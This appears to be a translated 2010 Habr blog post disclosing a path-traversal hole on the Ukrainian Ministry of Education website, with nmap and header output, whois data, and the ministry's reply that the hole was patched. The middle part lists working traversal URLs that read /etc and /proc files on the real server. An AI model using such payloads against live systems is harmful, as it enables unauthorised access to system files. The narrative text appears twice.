Ministry of Education and Science of Ukraine ... Education 2.0 speak?
Today, comrades shared an interesting link
It became interesting to look, but what is there openly?
Silently:
Well ... Also an option ... port 80 and only ... It is a pity ...
')
Well then, just research excitement began to cut through:
I called ... I introduced myself (And from whom should I hide and why?). I tried to tell. To which I heard in response that they have such a hole, but it does not represent any danger, that it is only read only, etc. Well, I answered simply: “Yes (?), Okay” ...
Then he looked that this hole was " at dinner a hundred years ." Well, well, since nobody cares about such things, why should they care about me, do I really need the most?
But that's what was thought of. In principle, this is not a critical site, not a critical project. But if in the course of two years, people are just too lazy to clean holes (I’m not talking about vulnerabilities), what can happen if more other, more weighty educational and other projects start to take root? They said that the site was developed by some institute, but I thought: some student passed the session! :( All this is sad ...
UPD: It turns out that this topic has already opened up a bit ...
UPD: Hole on the site, as they say, covered . Covered literally immediately after they felt habroefekt:
It became interesting to look, but what is there openly?
Silently:
$ nmap www.mon.gov.ua Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2010-04-09 10:40 EEST Interesting ports on 212.111.193.189: Not shown: 1679 filtered ports PORT STATE SERVICE 80 / tcp open http Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds
Well ... Also an option ... port 80 and only ... It is a pity ...
')
$ w3m -dump_head www.mon.gov.ua HTTP / 1.1 200 OK Date: Fri, 09 Apr 2010 07:43:50 GMT Server: Apache / 2.2.6 (Fedora) X-Powered-By: PHP / 5.1.6 Connection: close Content-Type: text / html
Well then, just research excitement began to cut through:
- www.mon.gov.ua/main.php?query=../../../etc/rc
- www.mon.gov.ua/main.php?query=../../../etc/rc.local
- www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
- www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
- www.mon.gov.ua/main.php?query=../../../proc/meminfo
$ whois mon.gov.ua % This is the Ukrainian Whois query server #F. % Rights restricted by copyright. % %% .UA whois % Domain Record: % ============= domain: mon.gov.ua admin-c: AVB40-UANIC tech-c: AVB40-UANIC status: OK-UNTIL 20100605000000 nserver: ns.secondary.net.ua nserver: ns.mon.gov.ua remark: Ministry of Education and Science of Ukraine remark: Ministry of Science and Science of Ukraine changed: UARR149-UANIC 20090713150319 source: UANIC % Glue Record: % =========== nserver: ns.mon.gov.ua ip-addr: 88.81.234.94 % Administrative Contact: % ====================== nic-handle: AVB40-UANIC person: Anatoly Valentinovich Bortnikov address: Taras Shevchenko, 16 address: 01601 KIЇV address: UA phone: +380 (44) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC % Technical Contact: % ================= nic-handle: AVB40-UANIC person: Anatoly Valentinovich Bortnikov address: Taras Shevchenko, 16 address: 01601 KIЇV address: UA phone: +380 (44) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC %% .UA whois
I called ... I introduced myself (And from whom should I hide and why?). I tried to tell. To which I heard in response that they have such a hole, but it does not represent any danger, that it is only read only, etc. Well, I answered simply: “Yes (?), Okay” ...
Then he looked that this hole was " at dinner a hundred years ." Well, well, since nobody cares about such things, why should they care about me, do I really need the most?
But that's what was thought of. In principle, this is not a critical site, not a critical project. But if in the course of two years, people are just too lazy to clean holes (I’m not talking about vulnerabilities), what can happen if more other, more weighty educational and other projects start to take root? They said that the site was developed by some institute, but I thought: some student passed the session! :( All this is sad ...
UPD: It turns out that this topic has already opened up a bit ...
UPD: Hole on the site, as they say, covered . Covered literally immediately after they felt habroefekt:
Thanks for the information!Thanks Habra, we make this world better!
Our programmers are already doing code ...
Unfortunately, today we may not have time, the fact is that the author of the site quit 2 years ago ...
So far I have to shut off the entire list of attacking (about 2500) addresses on the firewall so that the site does not crash over the weekend.
I understand that the ugly decision, but temporarily so.
Source: https://habr.com/ru/post/90473/
All Articles